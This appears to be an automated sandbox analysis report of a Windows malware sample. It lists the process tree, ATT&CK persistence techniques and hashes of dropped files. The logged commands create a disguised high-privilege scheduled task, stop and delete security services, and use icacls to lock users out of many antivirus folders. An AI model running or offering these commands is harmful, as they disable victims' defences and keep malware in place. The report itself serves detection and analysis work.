C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
3Hidden Files and Directories
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\System\iediagcmd.exeMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\ProgramData\Microsoft\Check\Check.txtMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\ProgramData\Microsoft\Intel\R8.exeMD5
ad95d98c04a3c080df33ed75ad38870f
SHA1abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA25640d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed
-
C:\ProgramData\Microsoft\Intel\R8.exeMD5
ad95d98c04a3c080df33ed75ad38870f
SHA1abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA25640d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed
-
C:\ProgramData\Microsoft\Intel\taskhost.exeMD5
23d51bd68920fdfd90809197b8c364ff
SHA15eee02db6087702db49acb2619e37d74833321d9
SHA2560e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1
SHA5123159ccf3c21490e8841dcf950a3fc7359c3ff11a8db851f0b288a070ada4ba682c102668c8d1e922ea046f49cce819ba9bb9e90317e6f3fea1fa7a1799faf9d7
-
C:\ProgramData\Microsoft\Intel\taskhost.exeMD5
23d51bd68920fdfd90809197b8c364ff
SHA15eee02db6087702db49acb2619e37d74833321d9
SHA2560e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1
SHA5123159ccf3c21490e8841dcf950a3fc7359c3ff11a8db851f0b288a070ada4ba682c102668c8d1e922ea046f49cce819ba9bb9e90317e6f3fea1fa7a1799faf9d7
-
C:\ProgramData\Microsoft\Intel\wini.exeMD5
204d1fc66f62b26d0b5e00b092992d7d
SHA1e9a179cb62d7fddf9d4345d76673c49c88f05536
SHA25669c6fb12071b3672e14c9187b3a9e9b9f59437f2fc3ffb1b2f7cc7f78b97455b
SHA512cdb03b747a120872b984242a9e7d0ee9cc1b89f0d0fcc503a0d8d79b3f73f88acc5532f3bb42ee4cddb054b791baa672e5cf5fea74acda6b6c686768e1152a4f
-
C:\ProgramData\Microsoft\Intel\wini.exeMD5
204d1fc66f62b26d0b5e00b092992d7d
SHA1e9a179cb62d7fddf9d4345d76673c49c88f05536
SHA25669c6fb12071b3672e14c9187b3a9e9b9f59437f2fc3ffb1b2f7cc7f78b97455b
SHA512cdb03b747a120872b984242a9e7d0ee9cc1b89f0d0fcc503a0d8d79b3f73f88acc5532f3bb42ee4cddb054b791baa672e5cf5fea74acda6b6c686768e1152a4f
-
C:\ProgramData\RealtekHD\taskhost.exeMD5
676f368fed801fb2a5350f3bdc631d0b
SHA1e129c24447d7986fb0ed1725b240c00d4d9489ea
SHA2565c4eaa5bce7f19f29013685899d8205245f4a5a7728e770458619510e661b145
SHA512d4a3fb68eea4bcad55657a17ff8474d220e6e6cd113cb42d4d00a698e59941b1dab33bb626901fedeb312dee0c0a0559f9e4a75761028eab69a686c61e81160d
-
C:\ProgramData\RealtekHD\taskhost.exeMD5
676f368fed801fb2a5350f3bdc631d0b
SHA1e129c24447d7986fb0ed1725b240c00d4d9489ea
SHA2565c4eaa5bce7f19f29013685899d8205245f4a5a7728e770458619510e661b145
SHA512d4a3fb68eea4bcad55657a17ff8474d220e6e6cd113cb42d4d00a698e59941b1dab33bb626901fedeb312dee0c0a0559f9e4a75761028eab69a686c61e81160d
-
C:\ProgramData\RealtekHD\taskhostw.exeMD5
21feb5dccba8bf69df9a2307d206d033
SHA165fc243a3530225903bf422f19ffd0e3aad66f03
SHA256ff0140dbaa83c7f64b2e86f43cb5f54584b31b371b6c984d8b214fe35eb8e493
SHA512b5a25a95cf6d9dcac0de27f253f66cbba76029d6cb9311f41f351d7bb9d556d93023e04e922b42ebd0e47e68e84d2d8c50a37d9c2380524b22d9066079dedaca
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeMD5
191f67bf26f68cef47359b43facfa089
SHA194529e37aa179e44e22e9ccd6ee0de8a49a8f2fc
SHA2562144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5
SHA5127d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeMD5
191f67bf26f68cef47359b43facfa089
SHA194529e37aa179e44e22e9ccd6ee0de8a49a8f2fc
SHA2562144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5
SHA5127d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b
-
C:\ProgramData\WindowsTask\winlogon.exeMD5
ec0f9398d8017767f86a4d0e74225506
SHA1720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
-
C:\ProgramData\Windows\install.vbsMD5
5e36713ab310d29f2bdd1c93f2f0cad2
SHA17e768cca6bce132e4e9132e8a00a1786e6351178
SHA256cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA5128e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1
-
C:\ProgramData\Windows\reg1.regMD5
4dc0fba4595ad8fe1f010f9079f59dd3
SHA1b3a54e99afc124c64978d48afca2544d75e69da5
SHA256b2fd919e2acd61601c3341179a20ce1d0c2074e8907692dc83d55ba6c6b3eb3a
SHA512fb0855ad6a33a3efc44453f2a5624e0fc87818bf10d13a87d168be3e9c69b7c8dffb39a34193ab134f42b0af527566e74bada71742c09f90ffd60334ba5143b8
-
C:\ProgramData\Windows\reg2.regMD5
6a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1235a78495192fc33f13af3710d0fe44e86a771c9
SHA2564ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
